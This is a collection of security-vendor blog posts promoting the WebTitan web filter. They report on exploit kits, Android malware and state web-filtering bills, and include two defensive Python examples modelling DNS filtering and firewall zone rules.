The RIG exploit kit, used on compromised and malicious websites to silently download malware, has been upgraded with a new exploit. Windows Double Kill exploit code has been added to exploit the CVE-2018-8174 vulnerability – a remote code execution vulnerability that was addressed by Microsoft in its May 2018 Patch Tuesday update.
To protect against exploitation of this vulnerability, Windows users should ensure they have applied the latest round of patches, although many businesses have been slow to update their Windows devices, leaving them vulnerable to attack.
The vulnerability is in the VBScript engine and how it handles objects in memory. If the vulnerability is exploited, attackers would gain the same level of privileges as the current user, could reallocate memory, gain read/write access, and potentially remotely execute code on a vulnerable device. The vulnerability has been named ‘Double Kill’ and affects all Windows versions.
The Windows Double Kill vulnerability was being actively exploited in the wild when Microsoft released the update on Patch Tuesday. Initially, exploitation of the vulnerability was achieved through phishing campaigns using RTF documents containing a malicious OLE object. If activated, an HTML page was downloaded and rendered through an Internet Explorer library and the VBScript flaw was exploited to download a malicious payload. The attack could also be conducted via a malicious website. In the case of the latter, it does not matter what browser the user has set as default – on unpatched systems the IE exploit could still work.
The Windows Double Kill exploit code was posted online this week and it didn’t take long for it to be incorporated into the RIG exploit kit. End users could be directed to the RIG exploit kit through phishing campaigns, malvertising, web redirects, or potentially could visit malicious sites through general web browsing. In addition to the Windows Double Kill exploit, the RIG exploit kit contains many other exploits for a wide range of vulnerabilities. Any individual that lands on a URL with the kit installed could be vulnerable even if the latest Windows patch has already been applied.
The threat from email-based attacks is also likely to grow. The Double Kill exploit code has also been incorporated into the ThreadKit exploit builder, which is used to create malicious Office documents for use in phishing attacks.
Protecting systems against these types of attacks requires prompt patching, although many organizations are slow to apply updates out of fear of compatibility problems, which could cause performance issues. Consequently, prior to applying patches they need to be fully tested and that can take time. During that time, organizations will be vulnerable to attack.
A web filter – such as WebTitan – provides an additional level of protection while patches are assessed for compatibility. WebTitan provides protection against exploit kits and malware downloads by preventing end users from visiting known malicious sites, whether through general web browsing, redirects, or hyperlinks contained in phishing emails.
Managed Service Providers (MSPs) have the option of providing an additional layer of security to their clients to protect against web-based cyberattacks now that TitanHQ’s powerful 100% cloud-based web filtering solution, WebTitan, has been incorporated into the Kaseya IT Complete suite.
The Kaseya technology alliance partner (TAP) program is highly regarded and brings together some of the world’s leading providers of IT solutions for MSPs, including Bitdefender, Cisco, and Dell.
The Kaseya IT Complete platform provides MSPs with easy access to a wide range of managed service-ready software, including cybersecurity, cloud management, endpoint management, network management, identity & access management, and disaster & recovery services. The platform makes it easy for MSPs to expand the services they provide to their clients and deliver invaluable solutions quickly and efficiently.
The platform has been developed to help MSPs increase revenue by providing profitable new services, automate the delivery of those services, and add more value by exceeding SLAs. The ease at which the solutions can be delivered saves MSPs valuable time, allowing them to free up staff to work on strategic projects.
MSPs have access to a wide range of cybersecurity solutions through the platform, but one notable gap was an easy to deploy web filtering solution. The addition of WebTitan to the Kaseya platform allows MSPs to add another layer of security to better protect their clients from web-based threats and malware and ransomware downloads. Being DNS-based, the solution can be quickly deployed with no need for any software downloads, hardware purchases, or site visits and can be deployed and configured in a matter of minutes.
The integration of WebTitan into the Kaseya IT Complete platform was completed in time for the Kaseya Connect conference, which is taking place this week in Las Vegas, Nevada. The event will be attended by some of the top MSPs from around the world.
“Kaseya is a partner we have admired for a long time and I’m delighted to announce this integration,” said Ronan Kavanagh, CEO of TitanHQ. “With over 10 million endpoints under their management it represents a massive opportunity for our business. We look forward to working with Kaseya’s MSP partners and adding our personal touch and renowned focus on great customer support.”
“Adding WebTitan to our open ecosystem of partner solutions means our customers now have even greater access to best of breed technologies to meet the needs of their business. With growing concerns over malware, ransomware and phishing as key threats to MSP customers, WebTitan adds a highly effective layer of protection,” said Frank Tisellano, Jr., vice president of product management and design.
Venture online and you will be faced with a wide range of threats, some of which could result in your bank account being emptied, others could result in sensitive information being exposed and your accounts being hijacked. Then there is ransomware, which could be used to stop you from accessing your data (unless you have backups or pay the ransom payment).
More malicious websites are now being created than legitimate sites, so how can you stay safe online? One solution used by businesses and ISPs is the use of a web filter. A web filter can be configured to restrict access to certain categories of Internet content and block the majority of malicious websites.
While it is possible for businesses or ISPs to purchase appliances that sit between end users and the Internet, DNS filters allow the Internet to be filtered without having to purchase any hardware or install any software. So how does DNS filtering work?
How Does DNS Filtering Work?
DNS filtering – or Domain Name System filtering, to give it its full title – is a technique for blocking access to certain websites, webpages, or IP addresses. DNS is what allows easy to remember domain names to be used – such as Wikipedia.com – rather than typing in very difficult to remember IP addresses – such as 18.104.22.168. DNS maps domain names to IP addresses.
When a domain is purchased from a domain registrar and that domain is hosted, it is assigned a unique IP address that allows the site to be located. When you attempt to access a website, a DNS query is performed. Your DNS server looks up the IP address of the domain/webpage, which allows a connection to be made between the browser and the server where the website is hosted. The webpage is then loaded.
So how does DNS filtering work? With DNS filtering in place, rather than the DNS server simply returning the IP address if the website exists, the request is first subjected to certain controls. If a particular webpage or IP address is known to be malicious, the request to access the site is blocked. Instead of connecting to the website, the user is directed to a local IP address that displays a block page explaining that the site cannot be accessed.
This control could be applied at the router level, via your ISP, or by a third party – a web filtering service provider. In the case of the latter, the user – a business, for instance – points their DNS to the service provider. That service provider maintains a blacklist of malicious webpages/IP addresses, and if a requested site is on that blacklist, access is blocked.
Since the service provider also categorizes webpages, the DNS filter can also be used to block access to certain categories of webpages – pornography, child pornography, file sharing websites, gambling, and gaming sites, for instance. Provided a business creates an acceptable usage policy (AUP) and sets that policy with the service provider, the AUP will be enforced. Since DNS filtering is low-latency, there will be next to no delay in accessing safe websites that do not breach an organization’s acceptable Internet usage policies.
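The decision logic described above, as an added example that is not WebTitan's or any provider's code. Every domain, IP address, blacklist entry and category here is constructed; the resolver table stands in for the upstream lookup, and 192.0.2.1 stands in for the local block page address. It also shows the limitation that a brand-new malicious domain not yet on any list resolves normally.

```python
"""Model of a DNS filter: blacklist and category checks before the upstream answer is returned."""

# Constructed: RFC 5737 documentation address standing in for the local block page.
BLOCK_PAGE_IP = "192.0.2.1"

# Constructed stand-ins for the upstream resolver's answers (no real DNS lookups are made).
UPSTREAM_ANSWERS = {
    "wikipedia.com": "203.0.113.10",
    "news.example": "203.0.113.20",
    "casino.example": "203.0.113.30",
    "login-update.example": "203.0.113.40",
    "cdn.example": "198.51.100.7",
    # Constructed: a freshly registered phishing page not yet on any blocklist.
    "brand-new-phish.example": "203.0.113.50",
}

# Constructed blacklist and category feed, standing in for the service provider's data.
MALICIOUS_DOMAINS = {"login-update.example"}
MALICIOUS_IPS = {"198.51.100.7"}
CATEGORIES = {
    "casino.example": "gambling",
    "news.example": "news",
    "wikipedia.com": "reference",
}


def normalize(name):
    """Lower-case the query name and drop any trailing dot."""
    return name.strip().rstrip(".").lower()


def parent_domains(name):
    """Yield the name itself and each parent domain, so a listing for
    casino.example also covers www.casino.example."""
    labels = name.split(".")
    for i in range(len(labels) - 1):
        yield ".".join(labels[i:])


def resolve(name, blocked_categories=frozenset(), upstream=UPSTREAM_ANSWERS):
    """Answer a DNS query the way a filtering resolver would.

    Returns (ip, reason). ip is the real answer when the request is allowed,
    BLOCK_PAGE_IP when it is filtered, or None when the name does not exist.
    reason is one of: allowed, malicious-domain, category:<cat>, malicious-ip, nxdomain.
    blocked_categories is the business's acceptable usage policy (AUP).
    """
    name = normalize(name)

    # Domain-level controls apply to the name and all of its parents.
    for candidate in parent_domains(name):
        if candidate in MALICIOUS_DOMAINS:
            return BLOCK_PAGE_IP, "malicious-domain"
        category = CATEGORIES.get(candidate)
        if category in blocked_categories:
            return BLOCK_PAGE_IP, "category:" + category

    # Only now consult the upstream answer, and check the IP it points to.
    ip = upstream.get(name)
    if ip is None:
        return None, "nxdomain"
    if ip in MALICIOUS_IPS:
        return BLOCK_PAGE_IP, "malicious-ip"
    return ip, "allowed"


if __name__ == "__main__":
    aup = {"gambling"}
    for query in ("wikipedia.com", "www.casino.example", "login-update.example",
                  "cdn.example", "brand-new-phish.example", "nosuch.example"):
        print(query, "->", resolve(query, aup))
```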
Will a DNS Filter Block All Malicious Websites?
Unfortunately, no DNS filtering solution will block all malicious websites, as in order to do so, a webpage must first be determined to be malicious. If a cybercriminal sets up a brand-new phishing webpage, there will be a delay between the page being created and it being checked and added to a blocklist. However, a DNS web filter will block the majority of malicious websites.
Can DNS Filtering be Bypassed?
The short answer is yes. Proxy servers and anonymizer sites could be used to mask traffic and bypass the DNS filter unless the chosen solution also blocks access to these anonymizer sites. An end user could also manually change their DNS settings locally unless they have been locked down. Determined individuals may be able to find a way to bypass DNS filtering, but for most end users, a DNS filter will block any attempt to access forbidden or harmful website content.
No single cybersecurity solution will allow you to block 100% of malicious websites or all NSFW websites, but DNS filtering should certainly be part of your cybersecurity defences as it will allow the majority of malicious sites and malware to be blocked.
If you have yet to implement a web filtering solution, are unhappy with your current provider, or you have questions about web filtering in the workplace, contact the TitanHQ team today and ask about WebTitan Cloud.
There have been significant developments relating to exploit kits in the past few days. The threat actors behind the Magnitude exploit kit have now changed their malicious payload, and the EITest malware distribution network that directed traffic to exploit kits has finally been sinkholed.
Magnitude Exploit Kit Switches to GandCrab Ransomware Delivery
Exploit kit activity is at a fraction of the level of 2015 and 2016, and in 2017 there was a 62% reduction in the development of exploit kits according to research from Recorded Future.
However, exploit kit activity has not fallen to zero, and the malicious code is still widely used to deliver malware and ransomware, underscoring the continued need for technologies that block these attacks, such as web filtering solutions, and the continued need to keep on top of patching.
Exploit kits often leverage vulnerabilities in Java and Adobe Flash, although more recently it has been Microsoft vulnerabilities that have been exploited due to the fall in Java vulnerabilities and the phasing out of Adobe Flash.
One exploit kit that is still being used in extensive attacks, albeit attacks that are highly geographically targeted, is the Magnitude exploit kit.
For the past seven months, the Magnitude exploit kit has been delivering the Magniber ransomware payload almost exclusively in South Korea. However, there has been a notable change in the past few days with it also being used to distribute GandCrab ransomware, with the latter not restricted geographically and capable of infecting English language Windows devices.
While early variants of GandCrab ransomware were cracked and free recovery of files was possible, there is no known decryptor for the current version of GandCrab ransomware being distributed via Magnitude. While Adobe Flash and Microsoft exploits were commonly used, Magnitude is now using a fileless technique to load the ransomware. This technique makes it much harder to detect.
According to Malwarebytes, “The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriptlet that is later decoded in memory and executed.” Once run, the payload is injected into explorer.exe, files are encrypted, and the infected device is rebooted.
EITest Malware Distribution Network Disrupted
There has been some major good news on the exploit kit front this week with the announcement that the EITest malware distribution network has finally been sinkholed. EITest has been active since at least 2011 and has been used to distribute all manner of malware over the years.
EITest was a major distribution network responsible for countless Kronos, Ramnit, DarkCloud and Gootkit infections, although more recently was used to deliver ransomware variants such as CryptXXX and Cerber and send users to sites running social engineering and tech support scams.
Prior to being sinkholed, EITest was redirecting as many as 2 million users a day to a network of more than 52,000 compromised websites that had been loaded with exploit kit code and social engineering scams. Most of the compromised sites were WordPress sites based in the USA, China, and Ukraine.
The threat actors behind EITest were selling traffic to other actors in blocks of between 50,000 and 70,000 visitors at a cost of $20 per thousand.
Over a 20-day period since EITest was sinkholed, more than 44 million users were directed to the sinkhole rather than malicious websites.
Now all redirects to malicious websites have stopped. The compromised websites remain active, but rather than redirecting users to malicious domains they are directing traffic to benign domains controlled by abuse.ch and brilliantit.com.
Regardless of the size of your business, the most effective security measure to deploy to block threat actors from gaining access to your servers, workstations, and data is a hardware firewall. A hardware firewall will ensure your digital assets are well protected, but how should your firewall be configured for optimal network security? If you follow network segmentation best practices and set up firewall security zones you can improve security and keep your internal network isolated and protected from web-based attacks.
Network Segmentation Best Practices
Most businesses have a well-defined network structure that includes a secure internal network zone and an external untrusted network zone, often with intermediate security zones. Security zones are groups of servers and systems that have similar security requirements; each consists of a Layer 3 network subnet to which several hosts connect.
The firewall offers protection by controlling traffic to and from those hosts and security zones, whether at the IP, port, or application level.
There is no single configuration that will be suitable for all businesses and all networks, since each business will have its own requirements and necessary functionalities. However, there are some network segmentation best practices that should be adopted.
Suggested Firewall Security Zone Segmentation
In the above illustration we have used firewall security zone segmentation to keep servers separated. In our example we have used a single firewall, two DMZ (demilitarized) zones, and an internal zone. A DMZ zone is an isolated Layer 3 subnet.
The servers in these DMZ zones may need to be Internet facing in order to function. For example, web servers and email servers need to be Internet facing. Because they face the internet, these servers are the most vulnerable to attack so should be separated from servers that do not need direct Internet access. By keeping these servers in separate zones, you can minimize the damage if one of your Internet facing servers is compromised.
In the diagram above, the allowed direction of traffic is indicated with the red arrows. As you can see, bidirectional traffic is permitted between the internal zone and DMZ2, which includes the application/database servers, but only one-way traffic is permitted between the internal zone and DMZ1, which is used for the proxy, email, and web servers. The proxy, email, and web servers have been placed in a separate DMZ from the application and database servers for maximum protection.
Traffic from the Internet is allowed by the firewall to DMZ1. The firewall should only permit traffic via certain ports (80, 443, 25, etc.). All other TCP/UDP ports should be closed. Traffic from the Internet to the servers in DMZ2 is not permitted, at least not directly.
A web server may need to access a database server, and while it may seem a good idea to have both of these virtual servers running on the same machine, from a security perspective this should be avoided. Ideally, both should be separated and placed in different DMZs. The same applies to front end web servers and web application servers, which should similarly be placed in different DMZs. Traffic between DMZ1 and DMZ2 will no doubt be necessary, but it should only be permitted on certain ports. DMZ2 can connect to the internal zone for certain special cases such as backups or authentication via Active Directory.
The internal zone consists of workstations and internal servers, internal databases that do not need to be web facing, Active Directory servers, and internal applications. We suggest that Internet access for users on the internal network be directed through an HTTP proxy server located in DMZ1.
Note that the internal zone is isolated from the Internet. Direct traffic from the internet to the internal zone should not be permitted.
The above configuration provides important protection to your internal networks. In the event that a server in DMZ1 is compromised, your internal network will remain protected since traffic between the internal zone and DMZ1 is only permitted in one direction.
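The zone matrix described above, encoded as a checkable policy. This is an added example, not a configuration from the article: the subnets, the database and proxy port numbers, and the Active Directory/backup ports are constructed stand-ins, and the model decides only whether a new connection may be initiated (return traffic is assumed to be handled by the firewall's stateful connection tracking).

```python
"""Zone-to-zone firewall policy for the single-firewall, two-DMZ design."""
import ipaddress

# Constructed subnets for the three zones; anything outside them is "internet".
ZONES = {
    "dmz1": ipaddress.ip_network("10.1.0.0/24"),     # proxy, email, web servers
    "dmz2": ipaddress.ip_network("10.2.0.0/24"),     # application / database servers
    "internal": ipaddress.ip_network("10.10.0.0/16"),  # workstations, AD, internal apps
}


def zone_of(ip):
    """Map an address to its security zone; unknown addresses are the Internet."""
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "internet"


# One entry per arrow in the design: (source zone, destination zone) -> allowed
# destination ports, or "any". A missing pair means the flow is denied.
ALLOWED = {
    ("internet", "dmz1"): {80, 443, 25},        # inbound web and mail only
    ("dmz1", "internet"): {80, 443, 25},        # proxy fetches pages, mail relays out
    ("dmz1", "dmz2"): {5432},                    # constructed: web tier to database
    ("dmz2", "dmz1"): {3128},                    # constructed: app servers out via proxy
    ("dmz2", "internal"): {88, 389, 636, 445},   # constructed: AD authentication, backups
    ("internal", "dmz2"): "any",                 # bidirectional with DMZ2
    ("internal", "dmz1"): {3128, 25, 443},       # constructed: users browse via the proxy
    # No ("dmz1", "internal"): the internal/DMZ1 link is one-way.
    # No ("internet", "dmz2") or ("internet", "internal"): not reachable directly.
    # No ("internal", "internet"): users must go through the DMZ1 proxy.
}


def is_allowed(src_ip, dst_ip, dst_port):
    """Decide whether a new connection from src_ip to dst_ip:dst_port may be opened."""
    src, dst = zone_of(src_ip), zone_of(dst_ip)
    if src == dst:
        return True  # intra-zone traffic does not cross the firewall
    ports = ALLOWED.get((src, dst))
    if ports is None:
        return False
    return ports == "any" or dst_port in ports


def policy_violations(table=ALLOWED):
    """Check a flow table against the design rules; an empty list means it is consistent.

    Useful when someone proposes adding a rule: run this before applying it.
    """
    problems = []
    for (src, dst), ports in table.items():
        if src == "internet" and dst != "dmz1":
            problems.append((src, dst, "the Internet may only reach DMZ1"))
        if src == "dmz1" and dst == "internal":
            problems.append((src, dst, "DMZ1 must never initiate to the internal zone"))
        if src == "internal" and dst == "internet":
            problems.append((src, dst, "internal users must go through the DMZ1 proxy"))
        if ports == "any" and "internet" in (src, dst):
            problems.append((src, dst, "Internet-facing flows need an explicit port list"))
    return problems


if __name__ == "__main__":
    print("internet -> web server :443", is_allowed("198.51.100.5", "10.1.0.10", 443))
    print("internet -> db server :5432", is_allowed("198.51.100.5", "10.2.0.10", 5432))
    print("dmz1 -> internal :445", is_allowed("10.1.0.10", "10.10.1.5", 445))
    print("violations:", policy_violations())
```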
By adhering to network segmentation best practices and using the above firewall security zone segmentation you can optimize network security. For added security, we also recommend using a cloud-based web filtering solution such as WebTitan which filters the Internet and prevents end users from accessing websites known to host malware or those that contravene acceptable usage policies.
Web-based malware attacks via exploit kits were commonplace in 2016, although in 2017 this mode of attack fell out of favor with cybercriminals, who concentrated on spam email to deliver their malicious payloads. Exploit kit activity is now at a fraction of the level of 2016, although 2017 did see an increase in activity using the Rig and Terror exploit kits.
Now, a recent discovery by Proofpoint could see exploit kit activity start to increase once again. A new traffic distribution system is being offered on darknet marketplaces that helps cybercriminals direct users to sites hosting exploit kits and conduct web-based malware attacks.
Traffic distribution systems – also known as TDS – buy and sell web traffic and are used to direct web users from one website to another. When a user clicks on a link that is part of a TDS system, they are directed to a website without their knowledge – a website that could host an exploit kit and trigger a malware download.
The new TDS – known as BlackTDS – requires threat actors to direct traffic to the service, which then filters that traffic and directs individuals to exploit kits based on their profile data. The service maximizes the probability of the exploit kit being able to download malware onto their device. The service can also be used to determine which malware will be downloaded, based on the profile of the user.
Threat actors that sign up to use the service can inexpensively select the exploit kits and malware they want installed with all aspects of the malware distribution service handled by the developers of BlackTDS. The developers also claim their cloud-based TDS includes fresh HTTPS domains that have not been blacklisted and that it is difficult for their cloudTDS to be detected by security researchers and sandboxes.
Using spam campaigns and malvertising, threat actors can direct traffic to BlackTDS with all aspects of drive-by downloads handled by the developers. Campaigns being run using BlackTDS have been directing users to the RIG-v, Sundown, and Blackhole exploit kits which are used to download a wide range of keyloggers, ransomware, and other malware variants.
The provision of this malicious service makes it cheap and easy for threat actors to take advantage of web-based malware distribution rather than relying on spam email to spread malicious software. It also makes it clear that exploit kits are still a threat and that web-based malware attacks are likely to become more of a problem over the coming months.
To find out more about how you can protect your business from exploit kits and web-based malware attacks, contact the TitanHQ team today and ask about WebTitan.
A new bill has been introduced that proposes mandatory use of WiFi filters in libraries in Idaho to prevent wireless networks from being used to view obscene content. Current legislation in the state only applies to wired networks.
In many other states, web filters in libraries are only required for libraries that wish to obtain discounts on their internet services under the e-Rate program. Many libraries choose not to apply for such discounts to enable them to continue to provide full access to all forms of Internet content, instead choosing to implement policies and procedures covering acceptable usage of their computers and WiFi networks.
Policies and procedures are not seen as sufficient in Idaho, which already has one of the strictest laws in the United States covering internet filtering in libraries. In 2011, legislation was introduced that made it mandatory for library web filters to be implemented on any computers that can be used by minors. The bill that was passed was scaled back, with the original bill calling for mandatory use of Internet filters on all library computers.
The new resolution was introduced by an Idaho House State Affairs committee this week along with a new bill – proposed by Rep. Lance Clow (R-Twin Falls) – that requires all libraries in the state to expand their Internet filtering controls to include their WiFi networks.
The concern is that simply connecting to library WiFi networks may allow users to gain access to obscene content. “Families are torn apart because of the proliferation of this material,” said Clow. Pornography is “creating a public health crisis.”
The resolution says the use of pornography has been “linked to a reduced desire in young men to marry, dissatisfaction in marriage, and infidelity.” The committee wholeheartedly backed the resolution and the new bill, even changing the language to make it clear that young women were also adversely affected by obscene images. A similar resolution was introduced in Utah, on which the Idaho resolution was based.
The use of WiFi filters in libraries is unlikely to cause too many problems, since many filtering solutions that have been implemented already have the capacity to filter both wired and wireless networks. Some libraries have already made the decision to implement Internet filtering controls on their WiFi networks, even though they are not currently required to do so under state laws.
The implementation of WiFi filters in libraries is a quick and easy process with a solution such as WebTitan Cloud for WiFi. WebTitan allows libraries to accurately filter Internet content to prevent obscene images from being accessed without overblocking content. The solution is easy to configure, has a low maintenance overhead, and is one of the cheapest web filtering solutions on the market.
Being DNS based, there is no need for any software installations or hardware purchases. The solution is highly scalable and there is no latency, which makes it a winning solution for libraries and their patrons. WebTitan Cloud can also be easily applied to wired networks.
For further information on WebTitan Cloud and WebTitan Cloud for WiFi, for a product demonstration, and information on a free trial of the solution, contact the TitanHQ team today.
Today has seen the announcement of a new partnership between TitanHQ – the leading provider of email and web filtering solutions for MSPs – and the international consulting, coaching, and peer group organization HTG. The announcement was made at the Q1 HTG Peer Groups meeting at the Pointe Hilton Squaw Peak Resort, Phoenix, Arizona.
The partnership sees TitanHQ’s web filtering solution – WebTitan; its cloud-based anti-spam service – SpamTitan; and its email archiving solution – ArcTitan made immediately available to the HTG community.
TitanHQ has developed innovative cybersecurity solutions specifically for managed service providers to help them provide even greater protection to their clients from the ever-increasing volume of email and Internet-based threats. The multiple award-winning solutions have now been adopted by more than 7,500 businesses and 1,500 MSPs, helping to protect them from malware, ransomware, viruses, phishing, botnets, and other cyber threats.
HTG is a leading peer group association that was recently acquired by the global technology giant ConnectWise. HTG helps businesses plan and execute strategies to drive forward growth and increase profits. Its consultants and facilitators share wisdom, provide accountability, and build meaningful relationships with businesses to help them succeed in today’s highly competitive marketplace.
The new partnership will see TitanHQ join HTG Peer Groups as a Gold vendor, making the firm’s MSP-friendly cybersecurity solutions immediately available to the HTG community.
“We’re delighted to welcome TitanHQ on board for 2018. As soon as the initial discussion started we knew they would make a great match for our community, as web security is a key area for our members in 2018,” said HTG Peer Groups founder, Arlin Sorensen.
HTG Peer Groups Founder Arlin Sorensen (Left); TitanHQ CEO Conor Madden (Right)
“WebTitan web filter was built by MSPs for MSPs and this exciting relationship with HTG Peer Groups is a continuation of that process. It allows us to listen to the opportunities and difficulties faced by MSP senior executives while also allowing us to share how we became a successful web security vendor. Our goal is to successfully engage with HTG members to build strong and long-lasting relationships,” said TitanHQ CEO, Conor Madden.
Web security is a hot topic within the managed service provider community. MSPs are being called upon to improve web security for their clients and protect against a barrage of phishing, malware, and ransomware attacks. They are also called upon to mitigate malware and ransomware attacks when they are experienced by their clients, which can be time-consuming and costly. By implementing WebTitan, TitanHQ’s award-winning web filtering solution, MSPs can substantially reduce support and engineering costs.
WebTitan serves as a barrier between end users and the Internet, blocking attempts by users to visit malicious websites where malware and ransomware is silently downloaded. WebTitan is also a powerful content filtering solution that can be used to enforce organizations’ acceptable Internet usage policies.
The web filtering solution and TitanHQ’s anti-spam solution SpamTitan have been developed specifically with MSPs in mind. The solutions can be applied and configured in under 30 minutes without the need for additional hardware purchases, software downloads, or site visits. The solutions have a low management overhead which means MSPs can protect their clients from email and web-based threats, reduce the hands-on time they need to spend on their clients and provide greater value while improving their bottom lines.
Delegate Dave A. LaRock (R) and State Sen. Richard Hayden Black (R) have proposed a new bill in the Virginia General Assembly that would require a web filter on internet-enabled devices sold or distributed in the state of Virginia.
House Bill No. 1592, also referred to as the Human Trafficking Prevention Act, is intended to reduce the availability of pornography, which it is believed will reduce the level of human trafficking in Virginia.
Mandatory Web Filter on Internet-Enabled Devices in Virginia
The bill calls for a web filter on all internet-enabled devices. The filtering mechanism would be required to block all obscene items, including obscene images, obscene performances, and obscene exhibitions, in addition to child pornography and unlawful images/videos of people that have been recorded and/or distributed without consent.
The bill does not amount to a ban on pornography in Virginia, as it would be possible for purchasers of Internet-enabled devices – which includes computers, laptops, tablets, and smartphones – to legally disable the content blocking mechanism.
To do so would require an individual to prove to the vendor or distributor of the device, by means of an official photographic ID, that they are over 18 years of age. The distributor of the device must receive a written receipt confirming a written warning has been provided advising of the dangers of unblocking the content filter.
Anyone purchasing a device must also pay a one-time digital access fee of $20 to have the web filter lifted, in addition to any fee charged by the distributor or seller of the device to remove the web filtering capability on the device.
The $20 fee would be paid into a Virginia Prevention of Human Trafficking Victim Fund, while the charges applied by the seller/distributor could be retained. The Virginia Prevention of Human Trafficking Victim Fund would be used solely for supporting victims of human trafficking and to pursue criminal prosecutions in human trafficking cases.
There will be stiff financial penalties and potentially jail time for any seller/distributor who fails to apply the web filter. Removal of the filter without paying the fee would similarly be considered an offense under the Virginia Consumer Protection Act.
There have been mixed reactions to the new bill. Proponents of the bill believe a web filter on internet-enabled devices is necessary to make it harder for state residents to access pornography and that it would also help to prevent minors from accidentally or deliberately accessing obscene website content. It is argued that making individuals pay for access to obscene content would help to eliminate temptation.
Critics of the bill have said the proposed legislation amounts to a ‘sin tax’, while many others feel that such a law would violate the human rights of Americans.
Virginia is not the first state in the US to consider such a bill. House Bill No. 1592 is a virtual carbon copy of legislation that has been proposed in several other states including Alabama, New Mexico, North Dakota and South Carolina.
According to Kaspersky Lab, one of the most dangerous threats to mobile users is Skygofree malware – a recently discovered Android malware threat that has been described as the most powerful Android malware variant ever seen.
Skygofree malware has only recently been detected, but it is the product of some serious development. Kaspersky Lab believes it has been in development for more than three years. The result is a particularly nasty threat that all users of Android devices should take care to avoid. Once it is installed on a device, it has access to a considerable amount of data. It also has some rather impressive capabilities, supporting 48 different commands.
Among its arsenal is the ability to take control of the camera and snap pictures and take videos without the knowledge of the user. It has access to geolocation data, so it is capable of tracking your every move: where you go, as well as where you have been.
Skygofree malware will steal call records and discover who you have spoken to and when and will read your text messages. The malware can also record conversations and background noise, both for telephone calls and when the user enters a specific location – based on geolocation data – that has been set by the attacker.
Whenever you are in range of a WiFi network that is controlled by the attacker, the device will automatically connect, even if WiFi is turned off. It also has access to all information in the phone’s memory, can check your calendar to tell what you have planned, and intercept WiFi traffic.
You also cannot privately communicate using WhatsApp with Skygofree malware installed. It abuses the Android Accessibility Service and can view your messages. Skype conversations are similarly not secure. As if that was not enough, the malware also serves as a keylogger, recording all data entered on the device.
With such an extensive range of functions, this powerful new malware variant is clearly not the work of an amateur. It is believed to be the product of an Italian intercept and surveillance company called Negg, which is known to work with law enforcement agencies.
Kaspersky Lab researcher Alexey Firsh said, “Given the artefacts we discovered in the malware code and our analysis of the infrastructure, we have a high level of confidence that the developer behind the Skygofree implants is an Italian IT company that offers surveillance solutions, rather like HackingTeam.”
Skygofree malware is spread via malicious websites that closely resemble those of mobile carriers. Several mobile carriers, including Vodafone, have been spoofed.
Protecting against malware threats such as this is difficult. The best defense is to be extremely careful browsing the internet. However, with malicious adverts able to redirect users to malicious sites, careful browsing is no guarantee of safety.
How to Protect Your WiFi Network and Block Malicious Websites
WebTitan for WiFi offers protection from malware when users connect to your WiFi network. WebTitan for WiFi is a powerful web filtering solution that can be used to restrict access to a predefined list of websites or configured to prevent users from visiting categories of websites known to carry a high risk of containing malware. Blacklists are also used to ensure known phishing and malware-laced websites, including those used to spread Android malware, cannot be accessed via your WiFi network.
To find out more about WebTitan for WiFi, and web filtering solutions for your wired networks, contact TitanHQ today.
Loapi malware is a new Android malware variant that is capable of causing permanent damage to Android smartphones.
The new malware variant was recently discovered by researchers at Kaspersky Lab. In contrast to many new malware variants that operate silently and remain on the device indefinitely, Loapi malware infections can be short-lived. Kaspersky performed a test on an Android phone and discovered that within two days the phone had been destroyed.
The aim of the malware is not sabotage. Destruction of the device is just collateral damage that results from the intense activity of the malware. Loapi malware performs a wide range of malicious functions simultaneously, including some processor-intensive activities that cause the device to overheat, causing irreparable damage.
In the test, over the two days, the constant activity caused the device to overheat and the battery to bulge, deforming the device and its cover.
The researchers said Loapi malware is like no other malware variant they have seen, and the researchers have seen plenty. Loapi malware was called a ‘jack of all trades’ due to its extensive capabilities. The malware is used to mine the cryptocurrency Monero, a processor-intensive process. The malware uses the processing power of infected devices to create new coins. While the mining process is less intensive than for Bitcoin, it still takes its toll.
Additionally, the malware allows infected devices to be used in DDoS attacks, making constant visits to websites to take down online services. The malware is also used to spam advertisements, bombarding the user with banners and videos.
The malware will silently subscribe to online services, and if they require text message confirmation, that is also handled by the malware. The malware gains access to SMS messages and can send text messages to any number, including premium services. Text messages are used to communicate with its C2 server. Messages are subsequently deleted by the malware to prevent detection by the user, along with any text message confirmations of subscriptions to online services. Kaspersky Lab researchers note that the malware attempted to access more than 28,000 URLs in the two days of the test.
Any apps that are installed on the device that could potentially affect the functioning of the malware are flagged with a false warning that the app contains malware, telling the user to uninstall them. The user will be bombarded with these messages until the app is uninstalled, while other security controls prevent the user from uninstalling the malware or deactivating its admin privileges.
There is little the malware cannot do. The researchers point out that the only function that Loapi does not perform is spying on the user, but since the modular malware can be easily updated, that function could even be added.
While conclusive proof has not been obtained, Kaspersky Lab strongly suspects the malware is the work of the same cybercriminal operation that was behind Podec malware.
So how is Loapi malware distributed? Kaspersky notes that as is common with other Android malware variants, it is being distributed by fake apps on third-party app stores, most commonly disguised as anti-virus apps. A fake app for a popular porn website has also been used. Additionally, fake adverts have been detected that promote these fake apps, with more than 20 separate locations discovered to be pushing the malware.
The malware has not yet been added to the Google Play store, so infections can be prevented by always using official app stores.
A new Kentucky web filtering law has been proposed that will make it mandatory for all vendors of Internet-enabled devices in the state of Kentucky to have pornography filters installed that will prevent users from accessing adult content.
Similar laws have been proposed in other U.S. states to deal with the growing social problems that are caused by pornography. The proposed Kentucky web filtering law is virtually a carbon copy of bills that are being considered in Alabama, North Dakota, and South Carolina.
The proposed Kentucky web filtering law was introduced by Rep. Dan Johnson (R-Mt. Washington). The aim is not to make it impossible to access pornography in Kentucky, only to make it harder. If Kentuckians want to use their Internet-enabled devices to access obscene material such as pornography, they will be required to pay a fee of $20 to have the web filtering controls removed.
The fee could be paid on purchase of the device or at a later date. Lifting the web filter would require proof of age to be supplied and a consent form to be signed. This opt-in approach to adult content is seen as the best way to prevent many of the problems that arise from use of pornography, and to make it much more difficult for minors to view adult web content.
As with other similar web filtering laws that have been proposed, the fees would be directed, in part, to crime victim compensation funds as well as for law enforcement and to add to state funds.
If the Kentucky web filtering law is passed, it would make the supply of PCs and mobile phones without filtering software a Class A misdemeanour. Selling an Internet-enabled device to a minor without web filtering software to block pornography would be a Class C felony.
